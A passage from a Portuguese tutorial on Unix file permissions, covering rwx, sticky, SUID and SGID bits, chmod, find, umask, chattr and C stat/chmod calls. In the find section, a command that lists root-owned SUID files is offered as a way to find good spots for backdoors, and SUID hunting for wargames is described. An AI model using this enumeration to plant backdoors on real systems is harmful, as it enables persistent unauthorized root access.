Vamos falar sobre as permissões básicas. São elas o ‘r’, ‘w’ e ‘x’.
Tais permissões possuem significados diferentes quando aplicadas a arquivos
e a diretórios.

* r – Read (Leitura):
+ Arquivo: significa que se pode ler o arquivo (através de um “cat” por
exemplo.

+ Diretório: significa que se pode ver o conteúdo do diretório (através de
“ls” por exemplo). Porém observe a explicação sobre a
permissão de execução mais abaixo.

* w – Write (escrita, gravação)
+ Arquivo: significa que se pode adicionar conteúdo e alterar um arquivo.

+ Diretório: significa que se pode criar e/ou apagar qualquer, repito
QUALQUER, arquivo e/ou diretório que esteja dentro deste,
mesmo que não se tenha permissão alguma para o
arquivo/diretório a ser apagado. Observe a explicação sobre
permissão de execução abaixo e “sticky bit” em 2.2.
Dica: NUNCA deixe o seu diretório home com esta permissão para
outros (também conhecida como world-writable).

* x – eXecute (execução)
+ Arquivo: pode-se executar o programa ou shell script (se um arquivo texto
não for um script e tiver esta permissão e você executar vai dar
um monte de “command not found”).

+ Diretório: significa que pode-se “entrar” no diretório. Esta permissão
é importante quando atribuída a um diretório. De nada adianta
uma permissão ‘w’ se não tiver ‘x’. Já no caso do ‘r’ sem ‘x’
ainda podemos ver o conteúdo do diretório, porém com algumas
limitações. Mas na hora de executar um “find” (tópico 3.3.)
precisamos ter ‘r’ e ‘x’.
Veja o exemplo abaixo, observe as permissões do diretório
“pratica” (o comando “id” que aparece no começo é apenas
para mostrar “quem sou eu”):

(ATENÇÃO: não confunda *o usuário* “hack” com *o grupo* “hack”, os nomes são
iguais mas são coisas diferentes!)

/* -=-=-= exemplo =-=-=- */
meleu:/home/hack$ id
uid=1000(meleu) gid=100(users) groups=100(users)
meleu:/home/hack$ ls -l
total 20
drwxr-xr-x 5 hack hack 4096 Jul 25 10:26 GNUstep/
drwxrwx— 2 hack hack 4096 Dec 22 06:58 ferramentas/
drwxr-xrw- 2 hack nogroup 4096 Dec 29 00:21 pratica/
drwxr-xr-x 2 hack users 4096 Dec 28 16:09 progs/
drwxr-x— 6 hack users 4096 Dec 29 00:51 textos/
meleu:/home/hack$ ls -l pratica/
/bin/ls: pratica/script.sh: Permission denied
/bin/ls: pratica/arquivo: Permission denied
/bin/ls: pratica/dir_teste: Permission denied
/bin/ls: pratica/mais_um_arquivo_teste: Permission denied
/bin/ls: pratica/arquivo_teste: Permission denied
total 0
meleu:/home/hack$ touch pratica/once_more_test
touch: pratica/once_more_test: Permission denied
/* -=-=-= exemplo =-=-=- */

Observe que eu consegui ler o conteudo do diretorio pratica, mas nao
consigo ver as permissoes destes arquivos. E nas duas ultimas linhas do exemplo
note que eu tenho nao consigo criar um arquivo dentro de pratica, mesmo tendo
permissao de escrita.

Vamos usar o “progs” da saída do comando “ls -l” acima para uma ilustração,
vamos ver o que significa cada bit:

drwxr-xr-x 2 hack users 4096 Dec 28 16:09 progs/

1: ‘d’ –> diz que é um diretório;
2: ‘r’ –> mostra que o dono deste diretório pode ver o seu conteúdo;
3: ‘w’ –> mostra que o dono deste diretório pode criar e/ou apagar
arquivos/diretórios que estejam dentro dele;
4: ‘x’ –> mostra que o dono deste diretório pode entrar nele (através do
comando cd)
5: ‘r’ –> mostra que qualquer integrante do grupo “users” pode ver o conteúdo
do diretório;
6: ‘-’ –> mostra que integrantes do grupo “users” não podem criar e/ou apagar
arquivos/diretórios que estejam no diretório “progs”;
7: ‘x’ –> mostra que integrantes do grupo “users” podem “entrar” no diretório;
8: ‘r’ –> qualquer pessoa que não seja o dono do arquivo e nem pertença ao
grupo “users” pode ver o conteúdo do diretório;
9: ‘-’ –> “outros” não podem criar e/ou apagar arquivos/diretórios que
estejam no diretório “progs”;
10: ‘x’ –> “outros” podem “entrar” no diretório.

É importante perceber que “outros” não significa “qualquer pessoa logada
no sistema”. Como já foi dito, “outros” se refere a qualquer um que NÃO SEJA
o dono do arquivo E NÃO PERTENÇA ao grupo que o arquivo/diretório está
atribuido. Estou enfatizando isso porque eu já me confundi uma vez por isso.
Vamos a um exemplo:

/* -=-=-= exemplo =-=-=- */
meleu:/home/hack$ id
uid=1000(meleu) gid=100(users) groups=100(users),102(hack)
meleu:/home/hack$ ls -l
total 20
drwxr-xr-x 5 hack hack 4096 Jul 25 10:26 GNUstep/
drwxrwx— 2 hack hack 4096 Dec 22 06:58 ferramentas/
drwxr-xrw- 3 hack nogroup 4096 Dec 29 01:22 pratica/
drwx—r-x 2 hack hack 4096 Dec 28 16:09 progs/
drwxr-x— 6 hack hack 4096 Dec 29 00:51 textos/
meleu:/home/hack$ cd progs/
bash: cd: progs/: Permission denied
/* -=-=-= exemplo =-=-=- */

Observe pela saída do “id” que eu (o usuário meleu) faço parte do grupo
hack, note também que o grupo hack não possui nenhuma permissão no diretório
“progs” e o resto do mundo possui permissão ‘r’ e ‘x’. Isso quer dizer que
as permissões são verificadas da esquerda pra direita, na sequência
proprietário -> grupo -> outros.

O algoritmo desta verificação é mais ou menos assim:

Começo
Se usuário é dono do arquivo Então
permissões do dono do arquivo é atribuída ao usuário;
Senão
Se usuário pertence ao grupo do arquivo Então
permissões do grupo do arquivo é atribuída ao usuário;
Senão
permissões de outros é atribuida ao usuário;
Fim.

2.2. Permissões Especiais
——————–

Foram estas permissões que motivaram minha pesquisa e a escrita deste
simples textículo (texto pequeno =] )… vamos a elas.
Antes é importante que se saiba que para qualquer um destes atributos ter
efeito é necessário permissão de execução. Para o Sticky bit é necessário
‘x’ para outros; para o SGID bit é necessário ‘x’ para o grupo; e para SUID
é necessário ‘x’ para o proprietário.

* t – Save Text Attribute (vulgo “sticky bit”)
+ Arquivos: A manpage do chmod explica: “Em sistemas Unix antigos, o
sticky bit fazia os arquivos executáveis serem acumulados
na swap. Esta característica não funciona em sistemas modernos
de Memória Virtual, e o kernel do Linux ignora o sticky bit
atribuído a arquivos. Outros kernels podem usar o sticky bit
em arquivos para propósitos definidos pelo sistema. Em alguns
sistemas só o superusuário pode atribuir o sticky bit em
arquivos”. Resumindo: na maioria dos sistemas, sticky bit em
arquivos serve para NADA.

+ Diretórios: significa que neste diretório o usuário pode apagar apenas
arquivos que ele seja o proprietário. Lembra da descrição
da permissão “w” em diretórios? Quem tem permissão “w” em
diretorio pode apagar qualquer arquivo dentro dele. Porém
se o sticky bit também tiver sido atribuído ao diretório,
o usuário só pode apagar arquivos dele.
Geralmente esta permissão é usada em diretórios
“world-writable” (por exemplo /tmp) para que não seja
permitido que qualquer usuário apague arquivos que não lhe
pertençam. Experimente um “ls -ld /tmp” e observe que o
último caractere da lista de permissões é um “t”.

* s – Set ID Attribute
Este atributo possui significados diferentes quando está relacionado ao
proprietário do arquivo e quando está relacionado ao grupo, assim como
também possui significados diferentes para arquivos e diretórios, em relação
aos arquivos você deve saber que este atributo NÃO FAZ EFEITO em shell scripts
(já ouvi rumores de que antigamente funcionava, mas desde que me tenho como
fuçador [1999] nunca vi isto). Em todos os casos ele funciona como um “tempero”
para a permissão de execução.

+ SUID Attribute (relacionado ao dono do arquivo)
- Arquivos: SUID significa Set-User-ID, ou seja ele atribui ao EUID
(Efective User ID) do usuário o UID do proprietário do
arquivo quando o arquivo é executado e somente durante a
execução do mesmo (logo, o arquivo precisa ser executável).
Isso quer dizer que durante a execução do arquivo você tem
acesso a tudo que o dono do arquivo tem.
Mas lembre-se SOMENTE DURANTE A EXECUÇÃO DO ARQUIVO.
No tópico 5. nós temos vários exemplos de esquemas deste
famigerado atributo.
- Diretórios: SEM EFEITO.

+ SGID Attribute (relacionado ao grupo)
- Arquivos: SGID significa Set-Group-ID, ele atribui ao EGID (Efective
Group ID) do usuário o ID do grupo do arquivo quando o
arquivo é executado e (assim como no SUID) somente durante
execução do mesmo.
- Diretórios: se forem criados arquivos dentro deste diretório o grupo
do arquivo será o mesmo grupo do diretório.
Não entendeu? Vamos a um exemplo:

/* -=-=-= exemplo =-=-=- */
meleu:~$ id
uid=1000(meleu) gid=100(users) groups=100(users),102(hack)
meleu:~$ mkdir teste
meleu:~$ ls -l
drwxr-x— 2 meleu users 4096 Jan 2 09:49 teste/
meleu:~$ chgrp hack teste #diretorio teste eh do grupo hack
meleu:~$ chmod g+s teste/ #atribuindo SGID ao diretorio teste
meleu:~$ ls -l
drwxr-s— 2 meleu hack 4096 Jan 3 12:44 teste
meleu:~$ cd teste/
meleu:~/teste$ touch arquivo.teste
meleu:~/teste$ ls -l
total 0
-rw-r—– 1 meleu hack 0 Jan 2 09:50 arquivo.teste
/* -=-=-= exemplo =-=-=- */

Acho que você percebeu que o arquivo.teste pertence ao grupo hack. :)

Isso é tudo que eu sei sobre permissões de arquivos. Mas até agora vimos
muita teoria. Vamos para um estudo mais pratico.

——————————————————————————-

3. Sobre Alguns Comandos
^^^^^^^^^^^^^^^^^^^^^

Aqui coloco algumas informações sobre alguns comandos que estão relacionados
a permissões de arquivos.

3.1. chmod
—–

O chmod serve para que você possa mudar as permissões de um arquivo, para
fazer isso você deve ser o dono do arquivo (ou o root). Bom… Não vou escrever
sobre como usar o comando, isso você deve ver na man page, vou escrever sobre
um “método” diferente de como usá-lo.
Se ligue na seguinte relação:

x = 1
w = 2
r = 4

Você pode usar esta relação para alterar as permissões de arquivos. Preste
atenção na seguinte linha de comando:

chmod 644 arquivo.txt
|||
dono do arquivo <-’|`-> outros
`-> grupo

Cada dígito diz respeito a um nível. Repare que no comando acima eu usei um
6, isso quer dizer que eu estou dando permissão de gravação (w = 2) e de
leitura (r = 4) (4 + 2 = 6). Com o comando acima o “arquivo.txt” terá as
seguintes permissões: -rw-r–r–

Veja esta tabela:

,——-,———–,———,
| octal | permissão | cálculo |
|——-|———–|———|
| 0 | — | 0 |
| 1 | –x | 1 |
| 2 | -w- | 2 |
| 3 | -wx | 2+1 |
| 4 | r– | 4 |
| 5 | r-x | 4+1 |
| 6 | rw- | 4+2 |
| 7 | rwx | 4+2+1 |
‘——-’———–’———’
OBS.: esta tabela só é valida para as permissões “básicas” (rwx).

Lembre-se de que cada dígito diz respeito a um nível! Logo no comando dado
como ilustração acima “chmod 644 arquivo.txt” está sendo setado ao dono do
arquivo a permissão de leitura e escrita e ao grupo e outros apenas a permissão
de leitura.

Agora em relação as permissões “especiais”. Observe a relação abaixo:

Sticky Bit = 1
SGID = 2
SUID = 4

Veja um exemplo de um comando e a explicação de o que estamos fazendo:

chmod 4755 programa
||||
SUID bit ‘–s——’ <–’||`–> permissão ‘r-x’ para outros
|`–> permissão ‘r-x’ para o grupo
permissão ‘rwx’ para o dono <–’

Após este comando o “programa” terá as seguintes permissões: -rwsr-xr-x

O dígito relacionado às permissões especiais precisa ser o primeiro de
quatro. Isso porque o chmod considera dígitos ausentes como 0. Exemplo:

$ chmod 4 arquivo.txt

é equivalente a

$ chmod 0004 arquivo.txt

Outra tabelinha de lambuja:

,——-,———–,———,
| octal | permissão | cálculo |
|——-|———–|———|
| 0 | ——— | 0 |
| 1 | ——–t | 1 |
| 2 | —–s— | 2 |
| 3 | —–s–t | 2+1 |
| 4 | –s—— | 4 |
| 5 | –s—–t | 4+1 |
| 6 | –s–s— | 4+2 |
| 7 | –s–s–t | 4+2+1 |
‘——-’———–’———’

Lembre-se: Os valores desta tabela são válidos apenas para o primeiro
dígito dos quatro presentes no comando chmod.

Relembrando que esta é apenas uma maneira de usar o chmod, uma lida na man
page irá revelar outras maneiras, algumas até mais simples.

3.2. ls
–

Essa parte é só pra você entender o que a saída de um “ls” significa.
Vamos repetir aqui o primeiro exemplo dado neste texto:

Como já foi dito, este ‘d’ no primeiro bit de algumas linhas significa
diretório. Agora vamos a uma tabela com todas as possibilidades.

,———–,—————————,
| Caractere | Significado |
|———–|—————————|
| – | arquivo regular |
| b | dispositivo de blocos |
| c | dispositivo de caracteres |
| d | diretório |
| l | link simbólico |
| p | FIFO |
| s | socket |
‘———–’—————————’

/* Só umas informações a mais… ;)
Os dispositivos de blocos são periféricos (como um disco rígido, por
exemplo) onde os dados são lidos e gravados, no próprio dispositivo como
blocos (no disco rígido geralmente o bloco é de 1024 bytes). Nos dispositivos
de caracteres os dados são lidos ou gravados em sequência e a I/O pode ser
feita como bytes separados (um terminal virtual é um exemplo de dispositivo
de caracteres). */

Observe também que no final do nome do diretório existe uma barra “/”. Isto
acontece quando é dado o paramatro -F ao comando “ls”, e geralmente existe um
alias que faz isso pra você.
Olhe uma tabela com outros caracteres que aparecem no final do nome para
facilitar a identificação:

,———,—————-,
| Símbolo | Significado |
|———|—————-|
| * | executável |
| / | diretório |
| = | socket |
| @ | symbolic link |
| | | FIFO |
‘———’—————-’

Agora em relação a permissões, permissões especiais pra ser mais específico.
Como já foi dito anteriormente, é necessário permissão de execução para que
os atributos “especiais” tenham efeito. Portanto quando estes atributos estão
sendo usados e não estão fazendo efeito algum eles aparecem em maiúsculo.
Veja um exemplo:

/* -=-=-= exemplo =-=-=- */
meleu:~$ touch arquivo
meleu:~$ chmod 7000 arquivo
meleu:~$ ls -l arquivo
—S–S–T 1 hack users 0 Jan 4 09:55 arquivo
/* -=-=-= exemplo =-=-=- */

Se quiser saber mais sobre o “ls” olhe a página man. ;-)

3.3. find
—-

Este comando é uma benção! :) Realmente muito útil e vale a pena você dar
uma lida na página man…. Mas vamos aqui a uma pequena introdução só para
você sentir um gostinho.

Veja aqui uma lista dos argumentos mais usados:

Argumento Descrição

-user procura por arquivos cujo dono seja .
-group procura por arquivos cujo grupo seja .
-uid procura por arquivos cujo dono tenha UID .
-gid procura por arquivos cujo grupo tenha GID .
-name procura por arquivos de nome que combine com o .
-type procura por arquivos do tipo
-perm [-] procura por arquivos de permissões (veja abaixo).

Nota-1: o parâmetro precisa estar no formato octal, e se você colocar
o ‘-’ na frente o find procurará por arquivos que tenham *no mínimo* as
permissões (veja exemplos abaixo).
Nota-2: os tipos que são usados com o parâmetro -type são aquelas letras
da tabela encontrada no tópico 3.2. (sobre ls), com a excessão do arquivo
regular onde é usado o caracter ‘f’.

É interessante que você use redirecionamento para poder consultar o
resultado da pesquisa. Só pra lembrar: ‘>’ redireciona a saída padrão e
‘2>’ redireciona a saída de erro padrão. Assim, uma boa é usar sempre
“2> /dev/null”. ;)

Vamos a alguns exemplos… para maiores detalhes… nem precisa falar né?!

+ procurar por arquivos suid ou sgid:
find / -perm -4000 -o -perm -2000

+ procurar por arquivos suid do root executável para todos (ou seja, bons
arquivos para se colocar backdoors ;-) ):
find / -user root -perm -4001
ou melhor:
find / -uid 0 -perm -4001

+ procurar por arquivos world-writable que não sejam links simbólicos,
nem dispositivos de caracteres, nem sockets, e nem que possuam o sticky
bit (OBS-1: 0’s a esquerda das permissões podem ser omitidos; OBS-2: a
exclamação ‘!’ serve para negação de tudo que está entre parênteses;
OBS-3: o ‘-o’ é o “ou lógico” do find)
find / -perm -2 ! ( -type l -o -type c -o -type s -o -perm -1000 )

Eu uso muito o find para encontrar os suid files nos WarGames (ver
referências), onde você tem que encontrar o suid file do level superior ao
seu. Por exemplo, quando está no level3 e quer procurar o suid file do
level4, use:
find / -user level4 -perm -4000 2> /dev/null

3.4. test
—-

Este comando é muito usado nos shell scripts. E dá pra se fazer muita
coisa interessante com ele. Não é o propósito deste texto ensinar
Shell Scripting, portanto se não entender procure outras fontes (inclusive em
).
Como você deve saber (senão, fica sabendo agora :P ) o “test expressão” é a
mesma coisa que usar “[expressão]” e esta última notação que irei usar. Como a
página man explica tudo que se deve saber, não vou explicar sobre o test aqui.
Mas aí vai um exemplo de script (o script é meio besta… somente para
ilustração mesmo). Não esqueça de ler a man page.

/* —————————— */
<++> Permissoes/perms.sh
#!/bin/bash

if [ $# -ne 1 ]; then
echo “Uso: `basename $0` filename” 1>&2
exit -1
fi

# -e verifica se o arquivo existe
if ! [ -e $1 ]; then
echo “$1 não existe”

# -k verifica se possui sticky bit
elif [ -k $1 ]; then
echo “$1 possui “sticky bit”"

# -g verifica se possui SGID
elif [ -g $1 ]; then
echo “$1 possui Set-Group-ID”

# -u verifica se possui SUID
elif [ -u $1 ]; then
echo “$1 possui Set-User-ID”
fi

<–>
/* —————————— */

Agora basta aprender um pouquinho de shell scripting que dá pra fazer
algumas coisas legais! ;)

3.5. umask
—–

O umask é um comando embutido no shell, e está presente nos shells mais
comuns (bash, ash, ksh, csh). Dizer que o ele é um comando embutido no shell
também quer dizer que não existe uma página man somente para este comando,
e sim que a descrição dele está na página man do shell em questão. Tente
digitar “man bash” e quando a manpage estiver sendo exibida procure por
umask (geralmente isso é feito teclando /umask ). Isso deve levá-lo
até a descrição do umask.
O umask define as permissões que NÃO serão aplicadas aos novos arquivos a
serem criados pelo usuário. Geralmente o umask padrão é atribuido em algum
arquivo “profile” (algo como ~/.profile para um usuário individual, ou
/etc/profile para todos usuários do sistema, mas isso pode variar muito em
cada sistema). Se você achar o seu arquivo profile, tente encontrar o comando
umask nele, deve estar em algum lugar. Agora vamos visualizar um exemplo:

/* -=-=-= exemplo =-=-=- */
meleu:~$ umask
0022
meleu:~$ mkdir bla1 #0022 eh permissao de escrita para grupo e outros
meleu:~$ ls -l #note que o dir criado NAO tem “w” para grupo e outros
total 4
drwxr-xr-x 2 meleu users 4096 2007-06-03 16:52 bla1/
meleu:~$ umask 0077 #mudei meu umask, 0077 eh rwx para grupo e outros
meleu:~$ mkdir bla2
meleu:~$ ls -l #note que bla2 NAO tem “rwx” para grupo e outros
total 8
drwxr-xr-x 2 meleu users 4096 2007-06-03 16:52 bla1/
drwx—— 2 meleu users 4096 2007-06-03 16:53 bla2/
/* -=-=-= exemplo =-=-=- */

Então lembre-se: umask define as permissões que NÃO serão atribuídas aos
novos arquivos a serem criados.

3.6. chattr
——

ATENÇÃO: este comando é específico do Linux e do sistema de arquivos ext2
e ext3! Não existe este comando no FreeBSD ou no minix por exemplo. Mesmo
assim achei interessante colocar esta seção pois o uso do Linux está muito
difundido por aí.

O comando chattr muda atributos de um arquivo em um sistema de arquivos
ext2 ou ext3. Os atributos são identificados por um caractere. Para definir
um atributo a um arquivo usa-se um sinal de “+” antes do caractere que
identifica o atributo, e para retirar o atributo usa-se um “-”. Tais
atributos são bem descritos na página man do chattr na seção ATTRIBUTES. Aqui
vamos ilustrar o poder do chattr com o atributo “i”, o chamado imutável
(immutable flag). Para atribuir o immutable flag a um arquivo o comando é o
seguinte “chattr +i arquivo”, mas antes de sair fazendo isso vamos a uma
explicação (retirada da página man do chattr):

“Um arquivo com o atributo ‘i’ não pode ser modificado: ele não pode ser
apagado nem renomeado, nenhum link pode ser criado para este arquivo e
nenhum dado pode ser escrito neste arquivo. Apenas o superusuário ou um
processo possuindo a capacidade CAP_LINUX_IMMUTABLE pode ligar ou
desligar este atributo.”

Ao ler isso nos vem logo uma pergunta à mente: nem o root pode modificar/
apagar este arquivo? Vamos a um exemplo para responder nossa pergunta. Os
comentários após o “#” são para ajudar na explicação e as linhas em branco
são somente para tornar a leitura mais agradável. Note que o comando lsattr
serve para listar os atributos de um arquivo.

/* -=-=-= exemplo =-=-=- */
root:~# id # sou o superusuario
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18(video),19(cdrom)

root:~# touch arquivo # estou criando um arquivo para nosso teste

root:~# ls -l arquivo # observe a seguir que tenho permissao de escrita
-rw-r–r– 1 root root 0 2007-06-04 15:43 arquivo

root:~# lsattr arquivo # vejamos os atributos deste arquivo
————- arquivo

root:~# echo “isto eh soh um teste” >> arquivo

root:~# cat arquivo # adicionei uma linha no arquivo, veja:
isto eh soh um teste
root:~# chattr +i arquivo # atribuindo o immutable flag

root:~# lsattr arquivo # veja o atributo i setado
—-i——– arquivo

root:~# echo “mais um pequeno teste” >> arquivo
-bash: arquivo: Permission denied

root:~# cat arquivo # uau! sou o root e nao consegui escrever no arquivo!
isto eh soh um teste
root:~# rm -f arquivo # serah que consigo apagar este miseravel?
rm: cannot remove `arquivo’: Operation not permitted
/* -=-=-= exemplo =-=-=- */

Viu só? Nem o root pode fazer qualquer modificação em um arquivo com o
immutable flag ativado. No entanto somente o root pode ligar ou desligar este
atributo de um arquivo. Logo, basta um “chattr -i arquivo” como root e tudo
volta ao normal.
Agora vamos a uma valiosa dica retirada do Tips-HOWTO seção 3.3. “How to
use the immutable flag”:

“Logo após instalar e configurar seu sistema, vá no /bin, /sbin, /usr/bin,
/usr/sbin e /usr/lib (e outros diretórios suspeitos) e faça uso liberal de
‘chattr +i comando’. Também faça isso aos arquivos do kernel na raiz. Agora
faça ‘mkdir /etc/.dist/’ e copie tudo de /etc/ naquele diretório (eu faço
isso em dois passos, usando /tmp/etcdist.tar para evitar recursão).
Opcionalmente você pode apenas criar /etc/.dist.tar.gz e marcar como
imutável.
A razão para tudo isto é limitar o dano que você pode fazer quando estiver
usando a conta root. Você não irá sobrescrever arquivos com um operador de
redirecionamento perdido, e não fará o sistema inutilizável com um espaço
perdido dentro de um comando ‘rm -fr’ (você ainda pode fazer bastante dano
em seus dados, mas seus bin’s e libs estarão mais seguros).
Isto também impossibilita ou torna mais difícil a ação de uma variedade
de exploits de segurança ou denial of service (uma vez que muitos deles
consistem em sobrescrever algum arquivo pelas ações de algum programa SUID).
A única inconveniência disto é quando se está desenvolvendo e fazendo seu
‘make install’ em vários tipos de binários do sistema. Por outro lado também
previne que o ‘make install’ sobrescreva os arquivos. Quando você esquecer
de ler o Makefile e fazer ‘chattr -i’ nos arquivos que seriam sobrescritos
(e nos diretórios para os quais você quer adicionar arquivos) — o make
falha, você só precisa usar o comando ‘chattr -i’ e reexecutar o make.(…)”

Dá pra perceber aí o quanto que vale a pena estudar o chattr, né?

3.7. Outros Comandos
—————

Aqui vai uma relação de alguns comandos que tem relação com permissões de
arquivos. Dê uma olhada na página man deles.

chown, chgrp, newgrp, su, sudo, suauth.

No momento só estou me lembrando destes… Devem haver muitos outros.

——————————————————————————-

4. Usando C
^^^^^^^^

Esta parte tem alguns pontos parecidos com a matéria de lamagra na
CoreZine n. 1 (ver 6. Referências). Não me chame de copião! Acho que em
português não tem nada sobre isso, por isso resolvi escrever.

4.1. Informações sobre Arquivos
————————–

Como já foi dito, todas as informações sobre um arquivo fica numa
estrutura chamada inode. Para que possamos consultar estas informações
através do C utilizamos as funções stat(), fstat() e lstat().
Aqui estão os protótipos e uma ligeira descrição:

int stat(const char *file_name, struct stat *buf);
int fstat(int filedes, struct stat *buf);
int lstat(const char *file_name, struct stat *buf);

-> stat: consulta informações sobre file_name no inode e armazena na
estrutura buf.
-> fstat: faz o mesmo só que ela acessa o arquivo através do inteiro
filedes (file descriptor), como por exemplo o retornado por open()
-> lstat: faz a mesmíssima coisa que stat porém quando o file_name é um link
a função stat() armazena em buf informações sobre o arquivo
apontado pelo link, já lstat() armazena em buf informações sobre
o próprio link.

Como podemos ver na página man destas funções a estrutura stat está
definida da seguinte forma:

struct stat
{
dev_t st_dev; /* device */
ino_t st_ino; /* inode */
mode_t st_mode; /* protection */
nlink_t st_nlink; /* number of hard links */
uid_t st_uid; /* user ID of owner */
gid_t st_gid; /* group ID of owner */
dev_t st_rdev; /* device type (if inode device) */
off_t st_size; /* total size, in bytes */
unsigned long st_blksize; /* blocksize for filesystem I/O */
unsigned long st_blocks; /* number of blocks allocated */
time_t st_atime; /* time of last access */
time_t st_mtime; /* time of last modification */
time_t st_ctime; /* time of last change */
};

Vamos agora analisar cada elemento desta estrutura.
st_dev: o dispositivo em qual o arquivo está gravado, para ver o “major and
minor numbers” use as macros major() e minor() definidas em
sysmacros.h. OBS.: Se você não sabe o que isto significa
leia o Apêndice.
st_ino: o inode que guarda as informações sobre o arquivo (cada arquivo
está relacionado a um único inode).
st_mode: serve para ver o tipo do arquivo (se é diretório, dispositivo de
bloco, etc) e também para ver as permissões. Para tais finalidades
são necessários alguns artifícios que veremos no código abaixo.
st_nlink: número de hard links para o arquivo. O mínimo é 1 (pelo menos
se o arquivo existir :P ) a cada hard link soma mais 1.
st_uid, st_gid: ID do dono e ID do grupo, respectivamente (duh!).
st_rdev: se o arquivo é um dispositivo de bloco ou de caracteres o st_rdev
irá armazenar os números maior e menor do dispositivo.
A diferença deste para o st_dev é que, por exemplo, o *arquivo de
dispositvo* /dev/hdd está gravado (aqui na minha máquina) em
/dev/hda2, então st_dev contém os números “maior” e “menor” do
/dev/hda2 ao passo que st_rdev contém os números maior e menor
do próprio /dev/hdd.
st_size: tamanho do arquivo em bytes (duh!)
st_blksize: é o tamanho do bloco que o sistema de arquivos usa para E/S,
é usado por alguns programas para que haja uma melhor
“bufferização”.
st_blocks: o número de blocos físicos que estão sendo usados por este arquivo
no disco.
st_atime: contém o dia/ano/mês/hora/… do último acesso a este arquivo
(leitura e/ou execução).
st_mtime: contém o dia/ano/mês/hora/… da última modificação feita no
arquivo.
st_ctime: contém /dia/ano/mês/hora/… da última alteração feita *no inode*.
Note que se você modificar o arquivo você estará alterando o inode
também, mas se mudar o inode não quer dizer que esteja alterando o
arquivo (ex.: através de chmod, chown, etc…). O que quero dizer é
que se alterar st_mtime automaticamente alterará st_ctime, mas o
contrário nem sempre acontece.

Bom… Acho que é melhor um código-fonte de exemplo que assim é a melhor
maneira de pegar as coisas. ;) Muita atenção nos comentários!

/* ————————— */
<++> Permissoes/filestat.c
#include /* Essa você deve saber pra que serve. :P */
#include /* Necessaria para usar lstat() */
#include /* Para usar major() e minor() */
#include /* Para declarar variável do tipo mode_t */
#include /* Para usar ctime() */

#define TRUE 1
#define FALSE 0
#define PERMS 07777

/* Como foi dito, a variável st_mode armazena num só inteiro o tipo do
arquivo e suas permissões. E é por isso que a gente precisa usar os
bitmasks diferentes para quando queremos ver o tipo do arquivo e para
ver as permissões do arquivo. A macro PERMS declarada acima é para se
“traduzir” as permissões. */

char *FileType (mode_t tipo);

unsigned short int isdev = FALSE; /* Isso é só pra verificar se o
arquivo é um dispositivo. */

int main (int argc, char **argv) {
struct stat arq;

if (argc != 2)
{
printf (“Uso: %s n”, argv[0]);
exit (-1);
}

if (lstat (argv[1], &arq))
{
perror (argv[1]);
exit (1);
}

printf (“Nome do arquivo:t%sn”, argv[1]);
printf (“Inode:ttt%dn”, arq.st_ino);
printf (“Tipo do Arquivo:t%sn”, FileType (arq.st_mode));

if (!isdev) { /* Se NÃO for um dispositivo… */
printf (“Tamanho:tt%d bytes, %d blocosn”, arq.st_size, arq.st_blocks);
printf (“Bloco de E/S:tt%d bytesn”, arq.st_blksize);
printf (“Dispositivo onde está salvo: tmaior: %d,”, major (arq.st_dev));
printf (” menor: %dn”, minor (arq.st_dev));
}
/* Nos dois printf’s acima e nos dois abaixo foram usadas as macros
major() e minor(), ambas declaradas em , estas
macros servem para retornar os números maior e menor do dispositivo
(Ver no Apêndice mais sobre estes números). */

else { /* Se for um dispositivo… */
printf (“Dispositivo verdadeiro: tmaior: %d,”, major (arq.st_rdev));
printf (” menor: %dn”, minor (arq.st_rdev));
}

printf (“Permissões:tt%04on”, arq.st_mode & PERMS);
/* Olhe aí a macro PERMS (que eu defini lá no começo) sendo usada. Ela
está sendo usada aqui para ver as permissões no formato octal (ver
tabelinhas do tópico 3.1.) portanto use sempre o formato “%o” para
imprimir com printf() (de preferência “%04o” para mostrar os 0’s a
esquerda). Lembre-se que sempre que for fazer esta “tradução” usar
sempre 5 dígitos sendo que o primeiro dígito seja um ‘0′, para que o
compilador entenda que é um octal. */

printf (“Numero de Hard Links:t%dn”, arq.st_nlink);
printf (“UserID: %d,tGroupID: %dn”, arq.st_uid, arq.st_gid);
printf (“Último acesso:ttt%s”, ctime (&arq.st_atime));
printf (“Última modificação:tt%s”, ctime (&arq.st_mtime));
printf (“Última alteração no inode:t%s”, ctime (&arq.st_ctime));
/* Nos 3 printf’s acima usei ctime() para imprimir o
timestamp bonitinho. */

return 0;
}

char *FileType (mode_t tipo) {
switch (tipo & S_IFMT) { /* Para saber o tipo do arquivo é necessário usar
o S_IFMT. Detalhes sobre esta e outras macros
definidas em podem ser vistos na
manpage do stat(). */
case S_IFDIR:
return “Diretório”;
case S_IFREG:
return “Arquivo Normal”;
case S_IFSOCK:
return “Socket”;
case S_IFLNK:
return “Link Simbólico”;
case S_IFBLK:
isdev = TRUE;
return “Dispositivo de Bloco”;
case S_IFCHR:
isdev = TRUE;
return “Dispositivo de Caracter”;
case S_IFIFO:
isdev = TRUE;
return “FIFO”;
}
return NULL;
}

/* * * EOF * * */
<–>
/* ————————— */

Note que eu usei a função lstat(), pois estou querendo informações sobre
o próprio link (se o arquivo for um link!) e não sobre o arquivo apontado por
ele. Para se usar a função fstat() você faria algo mais ou menos assim
(só um trechinho):

/* -=-=-= usando fstat =-=-=- */
…
int fd;
…
fd = open(argv[1], O_RDONLY); /* isso normalmente fica dentro de um ‘if’ */
fstat (fd, &arq); /* e isso também ;) */
…
/* -=-=-= usando fstat =-=-=- */

4.2. Mudando Permissões
——————

Para mudar as permissões de um arquivo você pode usar as seguintes funções:

int chmod(const char *path, mode_t mode);
int fchmod(int fildes, mode_t mode);

-> chmod: muda as permissões do arquivo/diretório path setando para mode.
-> fchmod: igual chmod porém usando fildes (file descriptor) para mudar as
permissões do arquivo.

Em ambas funções você usa o caminho do arquivo que você quer modificar
como primeiro parâmetro. E para “mode” (o segundo parâmetro) você deve usar
as macros definidas em stat.h ou um número octal de 5 dígitos (sempre de 5
dígitos!). Você pode ver as macros na página man das funções stat.
Evidentemente você só pode mudar as permissões de arquivos que lhe
pertençam (a não ser que você seja super-usuário).

Para mudar as posses do arquivo (vulgo ownership) você usa as seguintes
funções:

int chown(const char *path, uid_t owner, gid_t group);
int fchown(int fd, uid_t owner, gid_t group);
int lchown(const char *path, uid_t owner, gid_t group);

-> chown: mudar a proprietário do path para owner e o grupo para group.
-> fchown: mesmo esquema só que tem aquele lance do file descriptor.
-> lchown: mesmo esquema só que tem aquele lance de alterar o próprio link
